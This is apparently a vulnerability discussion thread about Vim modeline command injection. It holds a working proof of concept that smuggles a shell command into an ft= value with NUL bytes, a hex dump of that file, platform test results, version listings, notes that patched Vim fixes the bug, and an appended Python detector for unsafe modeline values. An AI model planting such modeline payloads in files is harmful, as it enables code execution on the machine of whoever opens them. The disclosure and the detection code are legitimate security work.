Any PoC for this vuln?
I put together a PoC:
echo -e '// vim: set ft=\x00!while\\ true;\\ do\\ echo\\ bar;\\ done\x00 : ' > wzz
vim wzz
works for me and a colleague, but it may depend on your vim (doesn't work for a friend of mine, trying to figure out why)
00000000 2f 2f 20 76 69 6d 3a 20 73 65 74 20 66 74 3d 00 |// vim: set ft=.|
00000010 21 77 68 69 6c 65 5c 20 74 72 75 65 3b 5c 20 64 |!while\ true;\ d|
00000020 6f 5c 20 65 63 68 6f 5c 20 62 61 72 3b 5c 20 64 |o\ echo\ bar;\ d|
00000030 6f 6e 65 00 20 3a 20 0a |one. : .|
00000038
The other machine where it doesn't work is Ubuntu 14.04 (so Debian based). What we saw there was that channel and job were not enabled (no +channel or +job in the feature list).
Successful on Fedora, Arch and FreeBSD 11.0-RELEASE-p1 (though tcsh is the default shell there, and the test payload above is for bash, so SHELL should be set to /usr/local/bin/bash, or the test payload should be tcsh compatible)
FreeBSD version:
$ vim --version
VIM - Vi IMproved 8.0 (2016 Sep 12, compiled Oct 5 2016 15:43:16)
Included patches: 1-19
Compiled by root@110amd64-quarterly-job-16
Huge version without GUI. Features included (+) or not (-):
+acl +file_in_path +mouse_sgr +tag_old_static
+arabic +find_in_path +mouse_sysmouse -tag_any_white
+autocmd +float +mouse_urxvt -tcl
-balloon_eval +folding +mouse_xterm +termguicolors
-browse -footer +multi_byte +terminfo
++builtin_terms +fork() +multi_lang +termresponse
+byte_offset -gettext -mzscheme +textobjects
+channel -hangul_input +netbeans_intg +timers
+cindent +iconv +num64 +title
-clientserver +insert_expand +packages -toolbar
-clipboard +job +path_extra +user_commands
+cmdline_compl +jumplist -perl +vertsplit
+cmdline_hist +keymap +persistent_undo +virtualedit
+cmdline_info +lambda +postscript +visual
+comments +langmap +printer +visualextra
+conceal +libcall +profile +viminfo
+cryptv +linebreak -python +vreplace
+cscope +lispindent -python3 +wildignore
+cursorbind +listcmds +quickfix +wildmenu
+cursorshape +localmap +reltime +windows
+dialog_con -lua +rightleft +writebackup
+diff +menu -ruby -X11
+digraphs +mksession +scrollbind -xfontset
-dnd +modify_fname +signs -xim
-ebcdic +mouse +smartindent -xpm
+emacs_tags -mouseshape +startuptime -xsmp
+eval +mouse_dec +statusline -xterm_clipboard
+ex_extra -mouse_gpm -sun_workshop -xterm_save
+extra_search -mouse_jsbterm +syntax
+farsi +mouse_netterm +tag_binary
system vimrc file: "/usr/local/etc/vim/vimrc"
user vimrc file: "$HOME/.vimrc"
2nd user vimrc file: "~/.vim/vimrc"
user exrc file: "$HOME/.exrc"
defaults file: "$VIMRUNTIME/defaults.vim"
fall-back for $VIM: "/usr/local/etc/vim"
f-b for $VIMRUNTIME: "/usr/local/share/vim/vim80"
Compilation: cc -c -I. -Iproto -DHAVE_CONFIG_H -DLIBICONV_PLUG -I/usr/local/include -O2 -pipe -DLIBICONV_PLUG -fstack-protector -fno-strict-aliasing -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1
Linking: cc -fstack-protector -L/usr/local/lib -Wl,--as-needed -o vim -lm -lelf -ltermlib
Fedora version:
$ vim --version
VIM - Vi IMproved 7.4 (2013 Aug 10, compiled Jun 2 2016 10:02:05)
Included patches: 1-1868
Modified by <bugz...@redhat.com>
Compiled by <bugz...@redhat.com>
Huge version without GUI. Features included (+) or not (-):
+acl +farsi +mouse_netterm +tag_binary
+arabic +file_in_path +mouse_sgr +tag_old_static
+autocmd +find_in_path -mouse_sysmouse -tag_any_white
-balloon_eval +float +mouse_urxvt -tcl
-browse +folding +mouse_xterm +termguicolors
++builtin_terms -footer +multi_byte +terminfo
+byte_offset +fork() +multi_lang +termresponse
+channel +gettext -mzscheme +textobjects
+cindent -hangul_input +netbeans_intg +timers
-clientserver +iconv +packages +title
-clipboard +insert_expand +path_extra -toolbar
+cmdline_compl +job +perl/dyn +user_commands
+cmdline_hist +jumplist +persistent_undo +vertsplit
+cmdline_info +keymap +postscript +virtualedit
+comments +langmap +printer +visual
+conceal +libcall +profile +visualextra
+cryptv +linebreak +python/dyn +viminfo
+cscope +lispindent +python3/dyn +vreplace
+cursorbind +listcmds +quickfix +wildignore
+cursorshape +localmap +reltime +wildmenu
+dialog_con +lua/dyn +rightleft +windows
+diff +menu +ruby/dyn +writebackup
+digraphs +mksession +scrollbind -X11
-dnd +modify_fname +signs -xfontset
-ebcdic +mouse +smartindent -xim
+emacs_tags -mouseshape +startuptime -xsmp
+eval +mouse_dec +statusline -xterm_clipboard
+ex_extra +mouse_gpm -sun_workshop -xterm_save
+extra_search -mouse_jsbterm +syntax -xpm
system vimrc file: "/etc/vimrc"
user vimrc file: "$HOME/.vimrc"
2nd user vimrc file: "~/.vim/vimrc"
user exrc file: "$HOME/.exrc"
fall-back for $VIM: "/etc"
f-b for $VIMRUNTIME: "/usr/share/vim/vim74"
Compilation: gcc -c -I. -Iproto -DHAVE_CONFIG_H -O2 -g -pipe -Wall -Werror=format-security -fexceptions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -m64 -mtune=generic -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1
Linking: gcc -L. -Wl,-z,relro -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -fstack-protector -rdynamic -Wl,-export-dynamic -Wl,--enable-new-dtags -Wl,-z,relro -Wl,-z,relro -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -L/usr/local/lib -Wl,--as-needed -o vim -lm -lnsl -lselinux -lncurses -lacl -lattr -lgpm -ldl -Wl,--enable-new-dtags -Wl,-z,relro -Wl,-z,relro -fstack-protector-strong -L/usr/local/lib -L/usr/lib64/perl5/CORE -lperl -lpthread -lresolv -lnsl -ldl -lm -lcrypt -lutil -lc
That's because I disable modelines by default in Debian (not just for root) and recommend using a plugin like securemodelines instead.
It has nothing to do with +channel or +job. You just need modelines enabled and syntax highlighting enabled.
Because you have an updated Vim which fixes the problem.
Yes, your vim has been fixed (Debian already provides a backported fix)
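A defender-side check for the modeline abuse shown in this thread, added here and not part of the original issue or of Vim's own code: it scans the first and last five lines of a file (Vim's default 'modelines' window) for ft=/syntax=/keymap= values containing anything outside a safe character set, which is the kind of validation the fix adds. The safe set (alphanumerics plus '.', '-', '_') and the simplified modeline grammar are my assumptions; the sample inputs are the PoC bytes from above and a constructed benign file.

```python
import re

# Options whose modeline values reach ":runtime"/autocommands; the fix for
# this bug restricts them to a safe set, assumed here to be [A-Za-z0-9._-].
_CHECKED = {"ft", "filetype", "syn", "syntax", "kmp", "keymap"}
_SAFE = re.compile(rb"^[A-Za-z0-9._-]*$")
_MARKER = re.compile(rb"(?:^|\s)(?:vi|vim|Vi|ex):\s*(.*)$")


def modeline_options(line: bytes) -> list:
    """Return the option tokens of a modeline (simplified grammar), else []."""
    m = _MARKER.search(line)
    if not m:
        return []
    rest = m.group(1)
    set_form = re.match(rb"(?:set|se)\s+", rest)
    if set_form:
        # "vim: set opts :" form: options end at the first unescaped ':'
        rest = re.split(rb"(?<!\\):", rest[set_form.end():], 1)[0]
        seps = rb"(?<!\\)\s+"
    else:
        # "vim: opt:opt opt" form: ':' and whitespace both separate options
        seps = rb"(?<!\\)[\s:]+"
    return [t for t in re.split(seps, rest.strip()) if t]


def find_unsafe_modelines(data: bytes, modelines: int = 5) -> list:
    """Scan the first/last `modelines` lines (Vim's default window) and return
    (line_no, option, value) for checked options whose value is unsafe.
    Lines are split on '\\n' only, so a NUL byte stays inside the value; Vim
    turns NUL into a line break internally, which is what this PoC abuses."""
    lines = data.split(b"\n")
    window = set(range(min(modelines, len(lines))))
    window |= set(range(max(0, len(lines) - modelines), len(lines)))
    hits = []
    for i in sorted(window):
        for tok in modeline_options(lines[i]):
            if b"=" not in tok:
                continue
            name, value = tok.split(b"=", 1)
            if name.decode("ascii", "replace") in _CHECKED and not _SAFE.match(value):
                hits.append((i + 1, name.decode(), value))
    return hits


# Constructed samples: the PoC bytes from this thread and a benign modeline.
POC = b"// vim: set ft=\x00!while\\ true;\\ do\\ echo\\ bar;\\ done\x00 : \n"
BENIGN = b"#!/bin/sh\necho hi\n# vim: set ft=sh ts=4 sw=4 et:\n"
```

Running `find_unsafe_modelines(POC)` reports the ft= value on line 1, while the benign file yields no hits; the check only reports, it does not rewrite the file.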